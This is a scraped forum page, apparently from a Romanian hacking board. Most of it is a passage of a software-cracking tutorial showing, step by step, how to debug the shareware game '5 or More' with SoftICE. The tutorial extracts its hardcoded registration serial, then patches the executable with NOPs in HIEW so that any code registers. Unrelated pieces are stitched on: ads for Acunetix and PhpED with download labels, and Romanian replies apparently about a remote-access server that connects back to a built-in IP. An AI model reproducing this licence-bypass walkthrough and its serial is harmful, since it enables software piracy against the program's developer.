"GetWindowTextA" "GetDlgItemText" "GetDlgItemTextA" The ones without the A's are for 16 bit programs, and since programs are not much made in 16 bit any more, it's usually just safe to use the ones with the A's. The A at the end of functions means it's for use with a 32 bit program only. So you're in SICE. I checked and this program uses "GetDlgItemTextA". If you try to use "GetWindowTextA" you just get confused! So type in "bpx getdlgitemtexta" [Return] Bpx simply is the instruction to "BreakPoint on eXecute". i.e. the program breaks when it executes the api function or call. Anyway, type anything in the two boxes I used "Liszt" for my name, and "12345" for my code. Click OK. !BAM! You're in SoftICE! You're at the point in the program where the program is calling the api function "GetDlgItemTextA" to get the name you entered. Press Ctrl+D to get out of SoftICE and you should be immediately brought back to SoftICE where the function is called again, this time to get the code you entered. Remember for the future, you will have to let SoftICE break however many boxes you have to fill in. If in a program you had to enter a name, a code, AND a company, for example, you would set the BreakPoint, press OK, get out of SoftICE, and then get out of SoftICE again, because it would have 3 boxes to read from, so it would need to call the function 3 times. Anyway, SoftICE has broken twice... We are now at the beginning of the "GetDlgItemTextA" function. The code in the code window below the highlighted line is the code for the function. Press F11. This lets the program carry out the function, but returns you to SoftICE IMMEDIATELY after the function has finished. Now you should be in the 5 or More program code. Press F10 until you get to the instruction: call 00405EF0 When that instruction is highlighted, press F8. There is a good reason for this... Pressing F10 steps over calls, while F8 steps INTO calls. Example time... Pressing F10 will carry out all of the instructions it comes across inside the call, until the program returns to the point where the call was. OK, I think I'd better explain about calls now. Calls are similar to jumps. When there is a call, say for example, we was to come across the following: :004018D9 E8520D0000 call 00402630 :004018DE 8D4C2414 lea ecx, dword ptr [esp+14] :004018E2 C684246C02000002 mov byte ptr [esp+0000026C], 02 The program goes to the address 00402630. What we have here for example is: :00402630 6AFF push FFFFFFFF :00402632 6896CF4000 push 0040CF96 :00402637 64A100000000 mov eax, dword ptr fs:[00000000] :0040263D 50 push eax :0040263E 64892500000000 mov dword ptr fs:[00000000] :00402645 51 push ecx :00402646 C3 ret This means the program would carry out all of the instructions in this part of code (from 00402630) and when it got to 00402646 (A "Return" instruction) it would go to 004018DE. (The instruction after the call to the above piece of code.) In SICE, pressing F10 at a call, would execute all of the instructions until the return instruction automatically, without you having a chance to see what is going on inside the call. When you press F8, you go inside the code, and the instructions are executed one by one, as you press F10 or F8. You should find that information valuable. Anyway, back to our example, "5 or More". You should have just pressed F8 instead of F10. Don't press anything else yet. Look at the code. You should be looking at the following instructions on the right side of the Code Window: MOV EAX,[ESP+04] TEST EAX,EAX JZ 00405F32 CMP BYTE PTR [EAX],31 JNZ 00405F32 CMP BYTE PTR [EAX+01],36 JNZ 00405F32 CMP BYTE PTR [EAX+02],31 JNZ 00405F32 CMP BYTE PTR [EAX+03],33 JNZ 00405F32 CMP BYTE PTR [EAX+04],35 JNZ 00405F32 CMP BYTE PTR [EAX+05],35 JNZ 00405F32 CMP BYTE PTR [EAX+06],31 JNZ 00405F32 CMP BYTE PTR [EAX+07],30 JNZ 00405F32 CMP BYTE PTR [EAX+08],00 MOV EAX,00000001 JZ 00405F34 XOR EAX,EAX RET Okay, I'll try to explain what's going on here. The first line of the above code puts the registration code you entered into EAX. The second line tests EAX with itself, and if the outcome of the test is 0 (Zero), that means that nothing was entered into the registration box, and if this happens, when the program reaches the next line of code, it will jump to 00405F32. So maybe the code at 00405F32 is the code to tell the program to get the error message. Looking at the next lines of code, there is a lot of things compared, and always, if the outcome here isn't zero, it will jump tp the same address (00405F32). So it's pretty good to assume that the code at 00405F32 is the error message process, which must mean that this is the process that checks the registration code you entered to the valid code. Look in EAX by typing "d eax". Look at the writing in the DATA Window (The one above the Code Window). Look at the right side of this window. The code you entered should be at the first line. The fourth line of the above code CoMPares the byte at EAX with the number 31. We can see EAX in the Data window at the moment. We can see that the first number/letter in view is the first digit of the code you entered. This is the number/letter it compares to the number 31. When we see something like this, with lots of numbers around 30, it will usually be hex. You can find out what the "ASCII" (Normal) value of hex 31 is by typing in "? 31". It will show you different values, the one at the end in the quotation marks is the "Normal Value". We see that Hex 31 = Normal 1. That tells us that the program compares the your first digit to 1. If the first digit of the code you entered isn't 1, the program will jump in the fifth line of the above code to the error message (00405F32). The next (Sixth) line of code compares EAX+01 to Hex 36. EAX+01 is as simple as that - EAX+01, If you type in "d eax+01" it will show you the second digit of the code you entered. Because it is EAX plus 01 place, which means the second digit of the code you entered. (I hope you understood that!) type "? 36". You see that is compares the second digit of the code you entered with 6. (Assuming, of course it hadn't already jumped after the 1st compare!). So we can see that the first two numbers of the valid registration code are 1 and 6. By looking at the rest of the code down to the 19th line of the above code, we can see that the correct registration code is: 16135510 An important thing to mention is that the valid registration code was already inside the program, and didn't have to be calculated. That tells us that the registration code will work for any name you enter. Other more difficult programs will take you're entered code, make the correct code for the name you entered, and compare your correct code with the one you entered. This means that codes will be different for each name that is entered in harder programs. (This program is easy to crack). Before you leave SoftICE, let's look at the rest of the code above. The 20th line compares EAX+08 to Hex 00. If type "? 00" you'll see that 00 is equal to nothing. That does NOT mean a space, (A space is Hex 20) it means Hex 00 is equal to nothing, so the program is just checking that there wasn't anything entered after the final digit. The actual program won't let you enter more than 8 characters anyway, so this must be in case bad crackers try to modify the contents of the memory, and mess up. So the CMP BYTE PTR [EAX+07],30 is the last digit of the code. If for some reason, the memory contains more than 8 characters at EAX, it would jump to a different part of code that I haven't bothered to look at because it is irrelevant. The next line (XOR EAX,EAX) zero's EAX, because it doesn't need it anymore (Note from CrackZ - actually this code is never executed, see the MOV EAX, 1 = good guy and EAX=0 is bad, EAX's value is checked after the RET). The next line is RET (Return). When the program (If the code is correct) reaches this, it will go back to the line after the call we pressed F8 at. See how calls work now? When we are sent to the first line of the above code by the call, there aren't any instructions that jump to a good registration message, only jumps to the bad message, so theoretically, it would be possible to crack the program using "Hackers' View" by finding the address of the call to the registration routine, and simply replacing the call instruction with NOP (No OPeration) instructions. In fact, yeah, we'll try that in a minute! You can leave SoftICE now, but make sure you clear all of the breakpoints before you leave, because we don't need them anymore. To do this type "bc *". Get out of SICE (Ctrl-D). Go to help in 5 or More, and go to register. Type in any name, and the code we found out. (16135510). WOW! It worked. Don't you feel good? You didn't even have to modify the program's code! It's a "Clean Crack"! --------------------------------------STOP PRINTING HERE----------------------------------------- Okay, now close the program. Go to the windows directory and find "5ormore.ini". Delete it. Now go back to the game directory and make a backup of the 5ormore.exe in case we screw up (You may want to rename it 5ormore.w32). Done? Good. Run HIEW (Hackers' View) and open 5ormore.exe. Press F4 and select Decode Mode. Press F5 and type ".0040609D" (This is the address that calls the registration check - The place we pressed F8). You are at the line: .0040609D E84EFEFFFF call 00405EF0 This is the right line. We want to get rid of the call, so we are going to change the bytes that tell the program what to do. I'll explain something first. Look at the E84EFEFFFF. These are the letters and numbers that tell the program what to do. They are what we change. To tell the program to jump to the registration check, it needs 5 bytes (Remember, a byte is two characters). So we need to make sure we replace exactly 5 bytes, no more, no less. A NOP instruction (No OPeration) only requires 1 byte, so we will need to put in 5 NOP instructions, so it has just canceled the call without doing anything else. Press F3. Now, carefully change the bytes to NOPs by pressing "90" five times. Press F9. Press F10. Go back to 5ormore.exe and run the program. Go to register and type in a name and any old number (not the correct one). It says regged! Great! Close the program, and then start it again to make sure... It says UNREGISTERED!!!! There is a simple reason for this. Each time the program begins, it gets the registration information you entered last time from the 5ormore.ini file in the windows directory, and then carries out the registration check again on the information to check the information is valid. So unless you want to go to register every single time you play the game, we have more work to do. Run W32Dasm. Open 5ormore.W32 (The backup copy). Look at the disassembly. Click on find. Type in: call 00405EF0 Now click OK. Remember the call to 00405EF0 is the call to the registration check. When W32Dasm has found something, write the address down. You should find two occurences. The first address should be "00405EE2", and the second should be "0040609D". You can close W32Dasm if you want, because I know what we have to do, and we won't need it anymore. Run HIEW and open 5ormore.exe. Press F4 and go to Decode Mode. We are going to get rid of both of these calls that we wrote down. Press F5 and type ".00406EE2" (This is the first address you wrote down). Press F3. There is 5 bytes in this call instruction, so we will need to type in "90" five times. Done? Press F9 to update the file. Now the next address. Type ".0040609D" (The other address from W32Dasm). Huh? What's this, there's already five NOPs here! Yep. That's because, remember, you already changed this one, before we found out that it checked the "5ormore.ini" file when it starts. We saw it as a call in W32Dasm, because we loaded the backup file, and we hadn't changed that file whatsoever with HIEW. So close HIEW. Run "5ormore.exe" Wow! It will stay registered this time! Exit 5 or More, run 5 or More, exit 5 or More, run 5 or More. Yeah, we made it so that the program didn't find an error with registration information when it starts. (That's because we stopped it from checking the code, so it couldn't jump to the unregistered code routine.) There we go! If you can find registration codes using SoftICE, do that, because it's so much better than modifying a program. I hope this information has been valuable! It should have! If you couldn't understand it, go through it all again. (I'm NOT kidding. If you want to learn, you have to understand these things). If I get enough E-Mails requesting more tutorials, I'll certainly consider it. If I get enough requests, I'll talk more about finding codes in SoftICE, where the program has to calculate your own code (much harder most of the time). All comments, questions, suggestions welcomed. Note: if some links didn't work try googling the tool or the program, sorry for the inconvenience. Best regards, Aym

Foloseste tema Default... Am mai spus de 100 de ori.

Audit your web site security with Acunetix Web Vulnerability Scanner If web applications are not secure, then your entire database of sensitive information is at serious risk. Why? Websites and related web applications must be available 24 x 7 to provide the required service to customers, employees, suppliers and other stakeholders Firewalls and SSL provide no protection against web application hacking, simply because access to the website has to be made public Web applications often have direct access to backend data such as customer databases and, hence, control valuable data and are much more difficult to secure Custom applications are more susceptible to attack because they involve a lesser degree of testing than off-the-shelf software Hackers prefer gaining access to the sensitive data because of the immense pay-offs in selling the data. Acunetix Web Vulnerability Scanner (WVS) is an automated web application security testing tool that audits your web applications by checking for exploitable hacking vulnerabilities. Automated scans may be supplemented and cross-checked with the variety of manual tools to allow for comprehensive web site and web application penetration testing. In depth checking for SQL Injection, Cross Site Scripting (XSS) and Other Vulnerabilities Acunetix checks for all web vulnerabilities including SQL injection, Cross site scripting and others. SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitor’s browser. Detection of these vulnerabilities requires a sophisticated detection engine. Paramount to web vulnerability scanning is not the number of attacks that a scanner can detect, but the complexity and thoroughness with the scanner launches SQL injection, Cross Site scripting and other attacks. Acunetix has a state of the art vulnerability detection engine which quickly finds vulnerabilities with a low number of false positives. It also locates CRLF injection, Code execution, Directory Traversal, File inclusion and Authentication vulnerabilities. AcuSensor Technology – identify more vulnerabilities with less false positives Allowing you to identify more vulnerabilities than a traditional black box Web Application Scanner and generating less false positives, Acunetix AcuSensor Technology combines black box scanning techniques with feedback from sensors placed inside the source code while source code is being executed. The advantages of AcuSensor Technology are many. These include: locating and fixing a vulnerabilities faster, whilst providing more information about each vulnerability, such as source code line number, stack trace and affected SQL query; it also checks for web application configuration problems, such as misconfiguration of web.config or php.ini files; detects many more SQL injection vulnerabilities without depending on web server error messages; and many more. ............................................................................................ Download: Manual:

Shell: Download:

PhpED is the Integrated Development Environment for PHP (PHP IDE), HTML, CSS, XML, SMARTY, XHTML and other. Balanced combination of advanced code editor, reliable dbg debugger, productive database connectivity client and fast and secure deployment abilities make PhpED a complete solution for most sophisticated developer needs. As in any complicated process, in php development a great deal of effectiveness depends on your choice of production tools. According to our customers, PhpED 5.6 saves up to 75% of development time. With PhpED you can: Create Code creation with our PHP IDE got a lot easier with the new PhpED 5.6 editing features. With PhpED's new highlighting abilities you can now navigate through your code easily and save the precious developing time. PHP Code Folding sets NuSphere PHP IDE apart from all others. Debug Powerful PHP Debugger is one of the best features in PhpED. Debug your code locally or remotely. Learn more Profile Introduced by NuSphere, PHP Profiler helps you find and eliminate all the bottlenecks in the code. Learn more Deploy Secure, fast and flexible publishing of your PHP scripts to a remote server right from PHP IDE. All major protocols such as FTP, FTPS, SSH/SFTP, and WebDAV are supported. Integrate New extensibility scope allows to integrate PhpED with 3rd party tools like php encoders, formatters or html validators. Pre-configured tools already include php documentor, html tidy, cvs client and html validator. Major features: Download:

Nu prea te poti conecta, decat pana cand ai acelasi IP cu care ai creat serverul. Daca deschizi serverul cu Notepad o sa iti vezi la sfarsit IP-ul. Trebuie sa pun o optiune de DNS.

Sa vezi Web-ul fara sa stie nu prea se poate. Avatarul e 96x96. Sa arate IP e posibil. PS: Vezi v1.2 si nu mai face post dublu.